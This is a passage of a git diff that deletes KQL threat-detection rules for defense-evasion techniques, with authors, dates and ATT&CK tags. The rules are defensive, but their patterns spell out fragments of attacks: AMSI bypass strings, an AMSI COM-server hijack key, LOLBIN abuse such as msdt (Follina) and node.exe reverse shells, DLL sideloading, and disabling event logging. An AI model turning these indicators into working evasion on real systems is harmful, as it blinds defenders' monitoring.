Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql b/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql deleted file mode 100644 index 2ac0c70c..00000000 --- a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/04 -// Level: medium -// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#" \ No newline at end of file diff --git a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql b/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql deleted file mode 100644 index 59588cc9..00000000 --- a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, @Kostastsale -// Date: 2018/08/17 -// Level: high -// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" or ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static") \ No newline at end of file diff --git a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql b/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql deleted file mode 100644 index 8dc88184..00000000 --- a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/04 -// Level: high -// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll")) \ No newline at end of file diff --git a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql b/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql deleted file mode 100644 index e192e978..00000000 --- a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "AVKkid.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql b/Defense Evasion/Potential_Adplus.EXE_Abuse.kql deleted file mode 100644 index 680e85fa..00000000 --- a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: high -// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. -// Tags: attack.defense_evasion, attack.execution, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql b/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql deleted file mode 100644 index 000b03f0..00000000 --- a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend 
Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql b/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql deleted file mode 100644 index 9fb59ef2..00000000 --- a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Beyu Denis, oscd.community -// Date: 2019/10/26 -// Level: medium -// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. -Attackers might abuse this in order to bypass application whitelisting. - -// Tags: attack.defense_evasion, attack.t1218, attack.t1027.004 -DeviceProcessEvents -| where FolderPath endswith "\\dnx.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql b/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql deleted file mode 100644 index 3a7f1b22..00000000 --- a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: high -// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process") \ No newline at end of file 
diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql deleted file mode 100644 index 8bb69102..00000000 --- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/29 -// Level: high -// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af "))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql deleted file mode 100644 index 4d1541c8..00000000 --- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe")) \ No newline at end of file 
diff --git a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql b/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql deleted file mode 100644 index 634eadc3..00000000 --- a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql deleted file mode 100644 index 2fb5e04e..00000000 --- a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2022/05/17 -// Level: high -// Description: Detects potential arbitrary file download using a Microsoft Office application -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql deleted file mode 100644 index 4d75232f..00000000 
--- a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/11/03 -// Level: medium -// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. -Attackers can abuse this utility in order to download arbitrary files via a configuration file. -Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. - -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql deleted file mode 100644 index e9726a4d..00000000 --- a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql deleted file mode 100644 index 9a5ab3b6..00000000 --- a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information) -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus")) \ No newline at end of file diff --git a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql b/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql deleted file mode 100644 index e86a83a1..00000000 --- a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where (RegistryKey contains "\\System\\CurrentControlSet\\Control\\WMI\\Autologger" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql b/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql deleted file mode 100644 index 49da9307..00000000 --- a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Den Iuzvyk -// Date: 2020/07/15 -// Level: low -// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. -An attacker can use this to authenticate to Azure AD in a browser as that user. - -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith 
"\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql deleted file mode 100644 index e33493d3..00000000 --- a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: medium -// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith 
"\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith 
"\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or 
FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals"))))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql deleted file mode 100644 index 17de2322..00000000 --- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/26 -// Level: medium -// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file -// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql deleted file mode 100644 index 0a63b246..00000000 --- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql b/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql
deleted file mode 100644
index 69960a71..00000000
--- a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
